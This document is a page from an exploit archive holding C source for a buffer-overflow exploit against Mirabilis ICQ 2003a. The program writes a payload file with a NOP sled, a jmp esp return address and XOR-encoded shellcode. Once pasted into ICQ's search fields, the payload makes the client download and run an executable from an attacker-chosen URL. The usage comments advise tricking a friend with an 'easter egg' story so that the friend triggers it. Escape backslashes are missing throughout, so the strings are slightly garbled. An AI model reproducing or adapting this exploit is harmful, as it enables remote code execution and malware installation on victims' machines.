[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
# Published : 2005-10-29
# Author : ATmaCA
# Previous Title : Snort <= 2.4.2 BackOrifice Remote Buffer Overflow Exploit (meta)
# Next Title : Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (win32)
/*
*
* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan and delicon
*
*/
/*
* Usage:
*
* Execute exploit, it will create "bof.txt" in current directory.
* Open ICQ <= 2003a and click "Add" button
* "Add / Invite Users to Your Contact List" dialog will be opened
* Copy the content of "bof.txt" to "First name" and "Last name" fields.
* Press "find" button
*
* Now, icq will download and run your server which you specified in WebUrl field.
*
* This exploit requires social engineering skills to use it. For example you should
* tell your friend that you've found a easter-egg and if he wants to see it he has to
* type your vuln. string to first and last name fields in icq then press find button etc...
*
/*
*
* Affected versions:
* Mirabilis ICQ Pro 2003a and prior versions.
*
* Tested with :
* ICQ 2003a Build #3800 on Win XP Pro Sp2
* ICQ 2002a Build #3728 on Win XP Pro Sp2
*
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
char *Sifrele(char *pszName1)
{
char *pszName = pszName1;
int Xor = 0x1d;
int Size = strlen(pszName);
for(int i=0;i<Size;i++)
pszName[i] = pszName[i]^Xor;
return pszName;
}
void main(int argc, char *argv[])
{
if (argc < 2)
{
printf("nntMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploitn");
printf("tBug discovered & exploit coded by ATmaCAn");
printf("tWeb: http://www.spyinstructors.com && http://www.atmacasoft.comn");
printf("tE-Mail: atmaca@icqmail.comn");
printf("tCredit to Kozan and deliconnn");
printf("Usage:n");
printf(" icq_bof <WebUrl>n");
printf(" Example:icq_bof http://www.atmacasoft.com/small.exen");
return;
}
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";
FILE *file;
char buf[485];
char *web;
short int weblength;
char *pointer = NULL;
char *newshellcode;
web = argv[1];
weblength = (short int)0xff22;
pointer = strstr(shellcode,"x22xff");
weblength -= strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1);
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"x1d");
if( (file = fopen("bof.txt", "w+")) == NULL )
return;
memset(buf, 0x90, 480);
//ret - icqate32.dll (5.3.4.3727) jmp esp addr - [Universal]
*(DWORD *) &buf[34] = 0x12025c5c;
memcpy(buf+34+32,newshellcode,strlen(newshellcode));
*(DWORD *) &buf[480] = 0x00000000;
fprintf(file, "%s", buf);
fclose(file);
printf("rnbof.txt has been generated!rn");
return;
}
// www.Syue.com [2005-10-29]